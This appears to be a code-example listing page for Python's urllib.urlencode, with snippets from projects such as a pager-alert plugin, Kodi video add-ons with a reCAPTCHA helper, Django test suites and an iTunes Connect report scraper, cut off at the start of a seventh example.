urllib.urlencode

Here are examples of the Python API urllib.urlencode, taken from open source projects. By voting up, you can indicate which examples are most useful and appropriate.

200 Examples
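
Before the project examples, here is a minimal sketch of what urllib.urlencode does (Python 2; in Python 3 the same function lives at urllib.parse.urlencode). The parameter names below are made up for illustration.

import urllib

# A mapping is encoded into an application/x-www-form-urlencoded string;
# keys and values are percent-encoded, spaces become '+', and dict order is arbitrary.
params = urllib.urlencode({'type': 'pocsag', 'message': 'hello world', 'flags': '0'})
# e.g. 'message=hello+world&type=pocsag&flags=0'

# Sequence values can be expanded into repeated keys with doseq:
print urllib.urlencode({'id': [1, 2, 3]}, doseq=1)   # 'id=1&id=2&id=3'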

Example 1

Project: BOSWatch
Source File: BosMon.py
def run(typ,freq,data):
	"""
	This function is the implementation of the BosMon-Plugin.
	It will send the data to a BosMon instance via HTTP

	The configuration for the BosMon-Connection is set in the config.ini.
	If a user is set, the HTTP request is authenticated.

	@type    typ:  string (FMS|ZVEI|POC)
	@param   typ:  Type of the dataset to send to BosMon
	@type    data: map of data (structure see interface.txt)
	@param   data: Contains the parameter for dispatch to BosMon.
	@type    freq: string
	@keyword freq: frequency is not used in this plugin

	@requires:  BosMon-Configuration has to be set in the config.ini

	@return:    nothing
	"""
	try:
		if configHandler.checkConfig("BosMon"): #read and debug the config

			try:
				#
				# Initialize headers and connect to the BosMon server
				#
				headers = {}
				headers['Content-type'] = "application/x-www-form-urlencoded"
				headers['Accept'] = "text/plain"
				# if a user is set in the config.ini we will use HTTP authorization
				if globals.config.get("BosMon", "bosmon_user"):
					# generate a base64-encoded authorization token for the HTTP request
					headers['Authorization'] = "Basic {0}".format(base64.b64encode("{0}:{1}".format(globals.config.get("BosMon", "bosmon_user"), globals.config.get("BosMon", "bosmon_password"))))
				logging.debug("connect to BosMon")
				# open connection to BosMon-Server
				httprequest = httplib.HTTPConnection(globals.config.get("BosMon", "bosmon_server"), globals.config.get("BosMon", "bosmon_port"), timeout=5)
				# debug level for console output (0 = no debug, 1 = debug)
				httprequest.set_debuglevel(0)
			except:
				logging.error("cannot connect to BosMon")
				logging.debug("cannot connect to BosMon", exc_info=True)
				# Without a connection, the plugin cannot continue
				return

			else:
				#
				# Format given data-structure to compatible BosMon string
				#
				if typ == "FMS":
					logging.debug("Start FMS to BosMon")
					try:
						# BosMon Telegramin expects assembly group, direction and tsi in one field
						# structure (bit flags summed into one decimal integer):
						#     bit 1: assembly group; bit 2: direction; bits 3+4: tactic short info (tsi)
						info = 0
						# assembly group:
						info = info + 1          # + b0001 (assumption: always 1, multimon-ng gives no output for it)
						# direction:
						if data["direction"] == "1":
							info = info + 2      # + b0010
						# tsi:
						if "IV" in data["tsi"]:
							info = info + 12     # + b1100
						elif "III" in data["tsi"]:
							info = info + 8      # + b1000
						elif "II" in data["tsi"]:
							info = info + 4      # + b0100
						# "I" adds nothing        + b0000

						params = urllib.urlencode({'type':'fms', 'address':data["fms"], 'status':data["status"], 'info':info, 'flags':'0'})
						logging.debug(" - Params: %s", params)
						# dispatch the BosMon-request
						bosMonRequest(httprequest, params, headers)
					except:
						logging.error("FMS to BosMon failed")
						logging.debug("FMS to BosMon failed", exc_info=True)
						return

				elif typ == "ZVEI":
					logging.debug("Start ZVEI to BosMon")
					try:
						params = urllib.urlencode({'type':'zvei', 'address':data["zvei"], 'flags':'0'})
						logging.debug(" - Params: %s", params)
						# dispatch the BosMon-request
						bosMonRequest(httprequest, params, headers)
					except:
						logging.error("ZVEI to BosMon failed")
						logging.debug("ZVEI to BosMon failed", exc_info=True)
						return

				elif typ == "POC":
					logging.debug("Start POC to BosMon")
					try:
						# BosMon Telegramin expects "a"-"d" as the RIC sub-address/function
						params = urllib.urlencode({'type':'pocsag', 'address':data["ric"], 'flags':'0', 'function':data["functionChar"], 'message':data["msg"]})
						logging.debug(" - Params: %s", params)
						# dispatch the BosMon-request
						bosMonRequest(httprequest, params, headers)
					except:
						logging.error("POC to BosMon failed")
						logging.debug("POC to BosMon failed", exc_info=True)
						return

				else:
					logging.warning("Invalid Typ: %s", typ)

			finally:
				logging.debug("close BosMon-Connection")
				try:
					httprequest.close()
				except:
					pass

	except:
		# something very mysterious
		logging.error("unknown error")
		logging.debug("unknown error", exc_info=True)
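
The FMS branch above packs assembly group, direction and tsi into a single info value before encoding it. Below is a minimal sketch of the same packing and the resulting query string, using a hypothetical dataset whose field names follow the data map the plugin receives.

import urllib

data = {"fms": "12345678", "status": "3", "direction": "1", "tsi": "III"}  # hypothetical FMS telegram

info = 1                      # b0001: assembly group, assumed always 1
if data["direction"] == "1":
    info += 2                 # b0010: direction
if "IV" in data["tsi"]:
    info += 12                # b1100
elif "III" in data["tsi"]:
    info += 8                 # b1000
elif "II" in data["tsi"]:
    info += 4                 # b0100

print urllib.urlencode({'type': 'fms', 'address': data["fms"],
                        'status': data["status"], 'info': info, 'flags': '0'})
# e.g. 'status=3&info=11&flags=0&address=12345678&type=fms' (dict order varies)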

Example 2

Project: ru
Source File: default.py
def GetVideo(url):
	if re.search('vk\.com|vkontakte\.ru', url):
		http = GET(url)
		soup = bs(http, from_encoding = "windows-1251")
		#sdata1 = soup.find('div', class_ = "scroll_fix_wrap", id = "page_wrap")
		rmdata = soup.find('div', style = "position:absolute; top:50%; text-align:center; right:0pt; left:0pt; font-family:Tahoma; font-size:12px; color:#FFFFFF;")
		if rmdata:
			rmdata = rmdata.find('div', style = False, class_ = False)
			if rmdata.br: rmdata.br.replace_with(" ")
			rmdata = "".join(list(rmdata.strings)).strip().encode('utf-8')
			print rmdata
			vk_email = Addon.getSetting('vk_email')
			vk_pass = Addon.getSetting('vk_pass')
			if 'изъято' in rmdata or not vk_email:  # 'изъято' = "withdrawn" (the video was removed)
				ShowMessage("ВКонтакте", rmdata, times = 20000)
				return False
			oid, id = re.findall('oid=([-0-9]*)&id=([0-9]*)', url)[0]
			url = 'http://vk.com/video' + oid + '_' + id
			#print url
			from vk_auth import vk_auth as vk
			vks = vk(vk_email, vk_pass)
			crid = vks.get_remixsid_cookie()
			if crid:
				if debug_mode: ShowMessage("ВКонтакте", "Применена авторизация")
			else:
				ShowMessage("ВКонтакте", "Ошибка авторизации")
				print "ошибка авторизации вконтакте"
				return False
			#print crid
			html = GET(url, headers = {"Cookie": crid})
			#print html
			rec = re.findall('var vars = ({.+?});', html)
			if rec:
				rec = rec[0]
				rec = rec.replace('\\', '')
			else:
				ShowMessage("ВКонтакте", "Видео недоступно")
				#print "видео недоступно"
				#if gebug_mode: print html
				return False
			#print 'rec: ' + str(rec)
			fvs = json.loads(rec, encoding = "windows-1251")
			#print json.dumps(fvs, indent = 1).encode('utf-8')
		else:
			rec = soup.find_all('param', {'name': 'flashvars'})[0]['value']
			fvs = urlparse.parse_qs(rec)
		#print json.dumps(fvs, indent = 1).encode('utf-8')
		uid = fvs['uid'][0]
		vtag = fvs['vtag'][0]
		#host = fvs['host'][0]
		#vid = fvs['vid'][0]
		#oid = fvs['oid'][0]
		q_list = {None: '240', '1': '360', '2': '480', '3': '720'}
		hd = fvs['hd'] if 'hd' in fvs else None
		if isinstance(hd, list): hd = hd[0]
		if isinstance(hd, float): hd = str(int(hd))
		print q_list[hd] + "p"
		#burl = host + 'u' + uid + '/videos/' + vtag + '.%s.mp4'
		#q_url_map = {q: burl % q for q in q_list.values()}
		#print q_url_map
		url = fvs['url' + q_list[hd]]
		if isinstance(url, list): url = url[0]
		#url = url.replace('vk.me', 'vk.com')
		sr = urlparse.urlsplit(url)
		if not IsIPv4(sr[1]):
			ipv = '6'
			url = url.replace('v6', '', 1)
		else: ipv = '4'
		if debug_mode: print 'IPv' + ipv
		#print url
		return url
	
	elif re.search('moonwalk\.cc|37\.220\.36\.\d{1,3}|serpens\.nl', url):
		page = GET(url)
		token = re.findall("video_token: '(.*?)'", page)[0]
		access_key = re.findall("access_key: '(.*?)'", page)[0]
		d_id = re.findall("d_id: (\d*)", page)[0]
		#referer = re.findall(r'player_url = "(.+?\.swf)";', page)[0]
		referer = url
		post = urllib.urlencode({"video_token": token, "access_key": access_key, "d_id": d_id, "content_type": 'movie'})
		#print post
		page = GET('http://moonwalk.cc/sessions/create_session', post = post, opts = 'xmlhttp', ref = url, headers = None)
		#print page
		page = json.loads(page)
		if use_ahds:
			url = page["manifest_f4m"]
		else:
			url = page["manifest_m3u8"]
		
		headers = {'User-Agent': UA, 'Connection': 'Keep-Alive', 'Referer': 'http://37.220.36.28/static/player/player_base.swf'}
		url += '|' + urllib.urlencode(headers)
		#print url
		return url
	
	elif 'rutube.ru' in url:
		data = GET(url)
		#print data
		import HTMLParser
		hp = HTMLParser.HTMLParser()
		data = hp.unescape(data)
		match = re.compile('"m3u8": "(.+?)"').findall(data)
		#print match
		if len(match) > 0:
			url = match[0]
			return url
	
	elif re.search('api\.video\.mail\.ru|videoapi\.my\.mail\.ru', url):
		data = GET(url)
		#match = re.compile('videoSrc = "(.+?)",').findall(data)
		match = re.compile('"metadataUrl":"(.+?)"').findall(data)
		if len(match) > 0:
			url = match[0]
		else:
			print "Mail.ru video parser is failed"
			ShowMessage(addon_name, "Mail.ru video parser is failed")
			return False
		data = GET(url, opts = 'headers')
		video_key_c = data[1].getheader('Set-Cookie')
		video_key_c = re.compile('(video_key=.+?;)').findall(video_key_c)
		if len(video_key_c) > 0:
			video_key_c = video_key_c[0]
		else:
			print "Mail.ru video parser is failed"
			ShowMessage(addon_name, "Mail.ru video parser is failed")
			return False
		jsdata = json.loads(data[0])
		vlist = jsdata['videos']
		vlist.sort(key = lambda i: i['key'])
		vdata = vlist[-1]
		url = vdata['url']
		headers = {'Cookie': video_key_c}
		url += '|' + urllib.urlencode(headers)
		return url
	
	elif 'youtube.com' in url:
		if '/embed/' in url:
			if debug_mode: print 'embed'
			video_id = re.findall('embed/(.+)\??', url)[0]
		else:
			finder = url.find('=')
			video_id = url[finder + 1:]
		url = 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % (video_id)
		print url
		return url
	
	elif re.search('moevideo\.net|playreplay\.net|videochart\.net', url):
		o = urlparse.urlparse(url)
		#print o
		uid = re.findall('http://(?:.+?)/framevideo/(.+?)\?', url)
		if uid: uid = uid[0]
		post = urllib.urlencode({"r": '[["file/flv_link",{"uid":"%s"}]]' % (uid)})
		purl = urlparse.urlunsplit((o.scheme, o.netloc, '/data', '' , ''))
		#print purl
		page = GET(purl, post = post)
		#print page
		page = json.loads(page)
		#print json.dumps(page, indent = 1).encode('utf-8')
		url = page['data'][0]['link']
		return url
		
	else:
		ShowMessage(addon_name, "Неизвестный видеохостинг: " + url)
		print "Неизвестный видеохостинг: " + url
		return False
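
Two of the branches above return the stream URL with the request headers appended after a '|' separator, the Kodi/XBMC convention for passing headers to the player; urllib.urlencode produces the key=value&... part after the pipe. A minimal sketch with placeholder values:

import urllib

stream_url = 'http://example.com/stream/index.m3u8'            # placeholder
headers = {'User-Agent': 'Mozilla/5.0', 'Cookie': 'video_key=abc;'}

playable = stream_url + '|' + urllib.urlencode(headers)
# e.g. 'http://example.com/stream/index.m3u8|Cookie=video_key%3Dabc%3B&User-Agent=Mozilla%2F5.0'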

Example 3

Project: ShaniXBMCWork2
Source File: unCaptcha.py
    def processCaptcha(self, key,lang,gcookieJar):
        
        headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
                 ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                 ("Referer", "https://www.google.com/recaptcha/api2/demo/"),
                 ("Accept-Language", lang)];

        botguardstring      = "!A"
        vers, language, jsh = self._collect_api_info()
        millis, rpc         = self._prepare_time_and_rpc()
        
        parent="www.google.com/recaptcha/api2/demo/"
        html =getUrl("https://www.google.com/recaptcha/api2/anchor?"+
                            urllib.urlencode({'k'       : key,
                                 'hl'      : language,
                                 'v'       : vers,
                                 'co' : "aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.",
                                 'size'     : "large", "cb"  : "8shiuzd0nyrv"}),headers=headers)

        token1 = re.search(r'id="recaptcha-token" value="(.*?)">', html)
        
        
        frameurl="https://www.google.com/recaptcha/api2/frame?"+urllib.urlencode({'c'      : token1.group(1),
                                     'hl'     : language,
                                     'v'      : vers,
                                     'bg'     : botguardstring,
                                     'k'      : key})
        html = getUrl(frameurl).decode("unicode-escape")
        
        #html = getUrl("https://www.google.com/recaptcha/api2/reload?k="+key,
        #                         post=urllib.urlencode({'c'      : token1.group(1),
        #                            'hl'     : language,
        #                             'v'      : vers,
        #                             'bg'     : botguardstring,
        #                             'reason'     : "t"}),headers=headers).decode("unicode-escape")
        
       
        #self.log_debug("Token #3: %s" % token3.group(1))
        
        
        
        #captcha_response =getUrl("https://www.google.com/recaptcha/api2/payload?"+
                                              #urllib.urlencode({'c':token3.group(1), 'k':key}),headers=headers)
                                              
        
        
        
        
#        self.log_debug("Token #1: %s" % token1.group(1))


        
        #html=getUrl("http://www.google.com/recaptcha/api/fallback?k=" + key,headers=headers);
        token=""
        roundnum=0
        first=True
        while True:

            message=""
            millis_captcha_loading= int(round(time.time() * 1000))

            
            token2 = re.search(r'"finput","(.*?)",', html)
            #self.log_debug("Token #2: %s" % token2.group(1))

            token3 = re.search(r'"rresp","(.*?)",', html)
            cval=token3.group(1)
            captcha_imgurl="https://www.google.com/recaptcha/api2/payload?"+urllib.urlencode({'c':token3.group(1), 'k':key})
            #response = base64.b64encode('{"response":"%s"}' % captcha_response)
        
            first=True
            if not first:
                payload = re.findall("\"(/recaptcha/api2/payload[^\"]+)",html);
                roundnum+=1
                message =re.findall("<label .*?class=\"fbc-imageselect-message-text\">(.*?)</label>",html);
                if len(message)==0:
                    message =re.findall("<div .*?class=\"fbc-imageselect-message-error\">(.*?)</div>",html)
                if len(message)==0:
                    token = re.findall("\"this\\.select\\(\\)\">(.*?)</textarea>",html)[0];
                    if not token=="":
                        line1 = "Captcha successful"
                        xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
                    else:
                        line1 = "Captcha failed"
                        xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
                    break
                else:
                    message=message[0]
                    payload=payload[0]


                imgurl=re.findall("name=\"c\"\\s+value=\\s*\"([^\"]+)",html)[0]
                cval=re.findall('name="c" value="(.*?)"',html)[0]
                captcha_imgurl = "https://www.google.com"+payload.replace('&amp;','&')
            
            headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
                 ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                 ("Referer", frameurl),
                 ("Accept-Language", lang)];
               


            html=getUrl(captcha_imgurl,headers=headers,cookieJar=gcookieJar);
            
            #print message
            message=message.replace('<strong>','')
            message=message.replace('</strong>','')
            #captcha_response=raw_input('-->')
            
            oSolver = cInputWindow(captcha = captcha_imgurl,msg = message,roundnum=roundnum)
            captcha_response = oSolver.get()
            #print 'captcha_response',captcha_response
            if captcha_response=="":
                break
            responses=""
            
            if 1==2:
                for rr in captcha_response.split(','):
                    responses += "&response=" + rr;
            else:
                    responses = base64.b64encode('{"response":"%s"}' % captcha_response)
                    responses=responses.replace('=','.')
                    ##responses="eyJyZXNwb25zZSI6IjAsMSwzLDYifQ.."
           
            timeToSolve     = int(round(time.time() * 1000)) - millis_captcha_loading
            timeToSolveMore = timeToSolve#timeToSolve + int(float("0." + str(random.randint(1, 99999999))) * 500)

            html = getUrl("https://www.google.com/recaptcha/api2/userverify?k="+key,
                                    post=urllib.urlencode({'c'       : cval,
                                          'response': responses,
                                          'v'      : vers,
                                          't'       : timeToSolve,
                                          'bg'     : botguardstring,
                                          'ct'      : timeToSolveMore}),headers=headers)
            if first and '["bgdata"' not in html:
               token3 = re.search(r'"uvresp","(.*?)",', html)
               return token3.group(1)
        return token
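
The same kind of encoded string is used two ways in this example: appended after '?' to form a GET query string, and passed as a POST body for the verify calls. A minimal sketch of that duality with urllib2 and placeholder values (the example itself goes through its own getUrl helper):

import urllib
import urllib2

params = urllib.urlencode({'k': 'site-key', 'hl': 'en'})       # placeholder values

# As a GET query string:
anchor_url = 'https://www.google.com/recaptcha/api2/anchor?' + params

# As a POST body; urllib2 sends str data with an
# application/x-www-form-urlencoded content type by default.
req = urllib2.Request('https://www.google.com/recaptcha/api2/userverify?k=site-key',
                      data=params)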

Example 4

Project: oioioi
Source File: tests.py
    def test_add_problem_to_contest(self):
        ProblemInstance.objects.all().delete()

        contest = Contest.objects.get()
        contest.default_submissions_limit = 42
        contest.save()
        filename = get_test_filename('test_simple_package.zip')
        self.client.login(username='test_admin')
        # Add problem to problemset
        url = reverse('problemset_add_or_update')
        response = self.client.get(url, follow=True)
        url = response.redirect_chain[-1][0]
        self.assertEqual(response.status_code, 200)
        response = self.client.post(url,
                {'package_file': open(filename, 'rb')}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(Problem.objects.count(), 1)
        self.assertEqual(ProblemInstance.objects.count(), 1)

        problem = Problem.objects.get()
        url_key = problem.problemsite.url_key

        # now, add problem to the contest
        url = reverse('add_or_update_problem',
                kwargs={'contest_id': contest.id}) + '?' + \
                        urllib.urlencode({'key': "problemset_source"})
        response = self.client.post(url, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertIn('Add from Problemset', response.content)
        self.assertIn('Enter problem', response.content)
        self.assertIn('s secret key', response.content)
        self.assertIn('Choose problem from problemset', response.content)

        pi_number = 3
        for i in xrange(pi_number):
            url = reverse('add_or_update_problem',
                    kwargs={'contest_id': contest.id}) + '?' + \
                        urllib.urlencode({'key': "problemset_source"})
            response = self.client.get(url,
                       {'url_key': url_key}, follow=True)
            self.assertEqual(response.status_code, 200)
            self.assertIn(str(url_key), response.content)
            response = self.client.post(url,
                        {'url_key': url_key}, follow=True)
            self.assertEqual(response.status_code, 200)
            self.assertEqual(ProblemInstance.objects.count(), 2 + i)

        # check submissions limit
        for pi in ProblemInstance.objects.filter(contest__isnull=False):
            self.assertEqual(pi.submissions_limit,
                             contest.default_submissions_limit)

        # add probleminstances to round
        for pi in ProblemInstance.objects.filter(contest__isnull=False):
            pi.round = Round.objects.get()
            pi.save()

        # we can see model solutions
        pi = ProblemInstance.objects.filter(contest__isnull=False)[0]
        self.check_models_for_simple_package(pi)

        # tests and models of every problem_instance are independent
        num_tests = pi.test_set.count()
        for test in pi.test_set.all():
            test.delete()
        pi.save()

        url = reverse('model_solutions', args=[pi.id])
        response = self.client.post(url, follow=True)
        self.assertEqual(response.status_code, 200)
        for test in ["0", "1a", "1b", "1c", "2"]:
            self.assertNotIn(">" + test + "</th>", response.content)

        for pi2 in ProblemInstance.objects.all():
            if pi2 != pi:
                self.assertEqual(pi2.test_set.count(), num_tests)
                self.check_models_for_simple_package(pi2)

        # reupload one ProblemInstance from problemset
        url = reverse('add_or_update_problem',
                kwargs={'contest_id': contest.id}) + '?' + \
                    urllib.urlencode({'key': "problemset_source",
                                      'problem': problem.id,
                                      'instance_id': pi.id})
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertIn(str(url_key), response.content)
        self.assertNotIn("Select", response.content)
        response = self.client.post(url, {'url_key': url_key}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(ProblemInstance.objects.count(), pi_number + 1)
        self.assertTrue(pi.round)
        self.assertEqual(pi.test_set.count(), num_tests)
        self.check_models_for_simple_package(pi)
        self.assertIn("1 PROBLEM NEEDS REJUDGING", response.content)
        self.assertEqual(response.content
               .count("Rejudge all submissions for problem"), 1)

        # reupload problem in problemset
        url = reverse('problemset_add_or_update') + '?' + \
                    urllib.urlencode({'problem': problem.id})
        response = self.client.get(url, follow=True)
        url = response.redirect_chain[-1][0]
        self.assertEqual(response.status_code, 200)
        response = self.client.post(url,
                {'package_file': open(filename, 'rb')}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(ProblemInstance.objects.count(), pi_number + 1)
        self.assertIn("3 PROBLEMS NEED REJUDGING", response.content)
        self.check_models_for_simple_package(pi)

        # rejudge one problem
        url = reverse('rejudge_all_submissions_for_problem', args=[pi.id])
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertIn("You are going to rejudge 1", response.content)
        response = self.client.post(url, {'submit': True}, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content
                 .count("Rejudge all submissions for problem"), pi_number - 1)
        self.assertIn("1 rejudge request received.", response.content)
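
The URLs in this test are built by joining a reversed route with '?' and an urlencoded dict; non-string values such as problem.id pass through str() inside urlencode. A minimal sketch of the pattern, with a hard-coded path standing in for reverse():

import urllib

base = '/c/c/problems/add'        # placeholder for what reverse(...) would return
url = base + '?' + urllib.urlencode({'key': 'problemset_source', 'problem': 42})
# e.g. '/c/c/problems/add?problem=42&key=problemset_source' (key order may vary)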

Example 5

Project: app-sales-machine
Source File: itcscrape.py
def getLastDayReport(username, password, reportDate, verbose=False) :
	logMsg('Initialising session with iTunes connect...', verbose)
	
	s = urlfetch.fetch(url=refererURL,
							method=urlfetch.GET,
							deadline=10)

	logMsg('DONE', verbose)

	logMsg('Locating login form...', verbose)
	# Stop HTMLParser from complaining about the bad HTML on this page
	content = s.content.replace('</font />', '</font>')
	b = BeautifulSoup(content)
	form = b.findAll('form')[0]
	formArgs = dict(form.attrs)

	loginUrl = baseURL + formArgs['action']
	loginData = {
		'theAccountName' : username,
		'theAccountPW' : password,
		'1.Continue.x' : '36',
		'1.Continue.y' : '17',
		'theAuxValue' : ''
	}
	loginArgs = urllib.urlencode(loginData)
	logMsg('DONE', verbose)

	logMsg('Attempting to login to iTunes connect', verbose)
	h = urlfetch.fetch(url=loginUrl,
							method=urlfetch.POST,
							deadline=10,
				   			payload=loginArgs)

	# Stop HTMLParser from complaining about the bad HTML on this page
	content = h.content.replace('</font />', '</font>')
	b = BeautifulSoup(content)
	reportURL = baseURL + dict(b.findAll(attrs={'name' : 'frmVendorPage'})[0].attrs)['action']
	logMsg('DONE', verbose)

	logMsg('Fetching report form details...', verbose)
	reportTypeName = str(dict(b.findAll(attrs={'id' : 'selReportType'})[0].attrs)['name'])
	dateTypeName = str(dict(b.findAll(attrs={'id' : 'selDateType'})[0].attrs)['name'])

	'''
	Captured with Live HTTP Headers:
		9.7=Summary
		9.9=Daily
		hiddenDayOrWeekSelection=Daily
		hiddenSubmitTypeName=ShowDropDown
	'''

	reportData = [
		(reportTypeName, 'Summary'),
		(dateTypeName, 'Daily'),
		('hiddenDayOrWeekSelection', 'Daily'),
		('hiddenSubmitTypeName', 'ShowDropDown')
	]

	reportArgs = urllib.urlencode(reportData)
	h = urlfetch.fetch(url=reportURL,
							method=urlfetch.POST,
							deadline=10,
				   			payload=reportArgs)

	b = BeautifulSoup(h.content)

	reportURL = baseURL + dict(b.findAll(attrs={'name' : 'frmVendorPage'})[0].attrs)['action']

	# Don't know if these change between calls. Re-fetch them to be sure.
	reportTypeName = str(dict(b.findAll(attrs={'id' : 'selReportType'})[0].attrs)['name'])
	dateTypeName = str(dict(b.findAll(attrs={'id' : 'selDateType'})[0].attrs)['name'])
	dateName = str(dict(b.findAll(attrs={'id' : 'dayorweekdropdown'})[0].attrs)['name'])
	logMsg('DONE', verbose)


	logMsg("Fetching report for %s..." % reportDate, verbose)
	'''
	Captured with Live HTTP Headers:
		9.7=Summary
		9.9=Daily
		9.11.1=03%2F12%2F2009
		download=Download
		hiddenDayOrWeekSelection=03%2F12%2F2009
		hiddenSubmitTypeName=Download
	'''

	reportData = [
		(reportTypeName, 'Summary'),
		(dateTypeName, 'Daily'),
		(dateName, reportDate),
		('download', 'Download'),
		('hiddenDayOrWeekSelection', reportDate),
		('hiddenSubmitTypeName', 'Download')
	]

	reportArgs = urllib.urlencode(reportData)
	h = urlfetch.fetch(url=reportURL,
							method=urlfetch.POST,
							deadline=10,
				   			payload=reportArgs)

	# Un-gzipped automatically
	filename = h.headers['filename'].replace('.gz', '')
	return {'filename': filename, 'content': h.content}
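
Unlike the dict-based calls in most of the other examples, this scraper hands urlencode a list of (name, value) pairs, which preserves the field order of the login and report forms. A minimal sketch of the difference, with placeholder field names:

import urllib

# A sequence of pairs is encoded in the order given...
print urllib.urlencode([('reportType', 'Summary'), ('dateType', 'Daily'),
                        ('download', 'Download')])
# 'reportType=Summary&dateType=Daily&download=Download'

# ...whereas a dict is encoded in whatever order the dict happens to iterate.
print urllib.urlencode({'reportType': 'Summary', 'dateType': 'Daily',
                        'download': 'Download'})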

Example 6

Project: ADL_LRS
Source File: test_ActivityState.py
    def test_get_with_since_and_regid(self):
        # create old state w/ no registration id
        state_id = "old_state_test_no_reg"
        testparamssince = {"stateId": state_id,
                           "activityId": self.activityId, "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
        teststatesince = {"test": "get w/ since",
                          "obj": {"agent": "test", "stateId": state_id}}
        updated = "2012-06-12:T12:00:00Z"
        put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated,
                               Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)

        self.assertEqual(put1.status_code, 204)
        self.assertEqual(put1.content, '')

        r = self.client.get(self.url, testparamssince,
                            X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r.status_code, 200)

        robj = ast.literal_eval(r.content)
        self.assertEqual(robj['test'], teststatesince['test'])
        self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' %
                         hashlib.sha1(r.content).hexdigest())

        # create old state w/ registration id
        regid = str(uuid.uuid1())
        state_id2 = "old_state_test_w_reg"
        testparamssince2 = {"registration": regid, "activityId": self.activityId,
                            "agent": self.testagent, "stateId": state_id2}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamssince2))
        teststatesince2 = {"test": "get w/ since and registration",
                           "obj": {"agent": "test", "stateId": state_id2}}
        put2 = self.client.put(path, teststatesince2, content_type=self.content_type, updated=updated,
                               Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)

        self.assertEqual(put2.status_code, 204)
        self.assertEqual(put2.content, '')

        r2 = self.client.get(self.url, testparamssince2,
                             X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r2.status_code, 200)

        robj2 = ast.literal_eval(r2.content)
        self.assertEqual(robj2['test'], teststatesince2['test'])
        self.assertEqual(robj2['obj']['agent'],
                         teststatesince2['obj']['agent'])
        self.assertEqual(r2['etag'], '"%s"' %
                         hashlib.sha1(r2.content).hexdigest())

        # create new state w/ registration id
        state_id3 = "old_state_test_w_new_reg"
        testparamssince3 = {"registration": regid, "activityId": self.activityId,
                            "agent": self.testagent, "stateId": state_id3}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamssince3))
        teststatesince3 = {"test": "get w/ since and registration",
                           "obj": {"agent": "test", "stateId": state_id3}}
        put3 = self.client.put(path, teststatesince3, content_type=self.content_type,
                               Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)

        self.assertEqual(put3.status_code, 204)
        self.assertEqual(put3.content, '')

        r3 = self.client.get(self.url, testparamssince3,
                             X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r3.status_code, 200)

        robj3 = ast.literal_eval(r3.content)
        self.assertEqual(robj3['test'], teststatesince3['test'])
        self.assertEqual(robj3['obj']['agent'],
                         teststatesince3['obj']['agent'])
        self.assertEqual(r3['etag'], '"%s"' %
                         hashlib.sha1(r3.content).hexdigest())

        # get no reg ids set w/o old state
        since1 = "2012-07-01T12:30:00+04:00"
        params = {"activityId": self.activityId,
                  "agent": self.testagent, "since": since1}
        r = self.client.get(
            self.url, params, X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        self.assertIn(self.stateId, r.content)
        self.assertIn(self.stateId2, r.content)
        self.assertNotIn(state_id, r.content)
        self.assertNotIn(self.stateId3, r.content)
        self.assertNotIn(self.stateId4, r.content)

        # get reg id set w/o old state
        since2 = "2012-07-01T12:30:00+04:00"
        params2 = {"registration": regid, "activityId": self.activityId,
                   "agent": self.testagent, "since": since2}
        r = self.client.get(
            self.url, params2, X_Experience_API_Version=settings.XAPI_VERSION, Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        self.assertIn(state_id3, r.content)
        self.assertNotIn(state_id2, r.content)
        self.assertNotIn(self.stateId, r.content)
        self.assertNotIn(self.stateId2, r.content)
        self.assertNotIn(self.stateId3, r.content)
        self.assertNotIn(self.stateId4, r.content)

        self.client.delete(self.url, testparamssince, Authorization=self.auth,
                           X_Experience_API_Version=settings.XAPI_VERSION)
        self.client.delete(self.url, testparamssince2, Authorization=self.auth,
                           X_Experience_API_Version=settings.XAPI_VERSION)
        self.client.delete(self.url, testparamssince3, Authorization=self.auth,
                           X_Experience_API_Version=settings.XAPI_VERSION)
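
The state parameters above include an activity IRI and an agent JSON blob; splicing them into the request path through urlencode percent-encodes all of the reserved characters. A minimal sketch with made-up xAPI-style values:

import urllib

params = {'activityId': 'http://example.com/activity/1',
          'agent': '{"mbox": "mailto:test@example.com"}',
          'stateId': 'old_state_test_no_reg'}
path = '%s?%s' % ('/xapi/activities/state', urllib.urlencode(params))
# e.g. '/xapi/activities/state?activityId=http%3A%2F%2Fexample.com%2Factivity%2F1&...'
# ':' '/' '{' '"' and '@' are all percent-encoded; key order may vary for a dict.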

Example 7

    def addMediaFile(self, package, contextType='video', encfs=False, dpath='', epath=''):
        thumbnail = self.cache.getThumbnail(self, package.file.thumbnail,package.file.id)
        listitem = xbmcgui.ListItem(package.file.displayTitle(), iconImage=package.file.thumbnail,
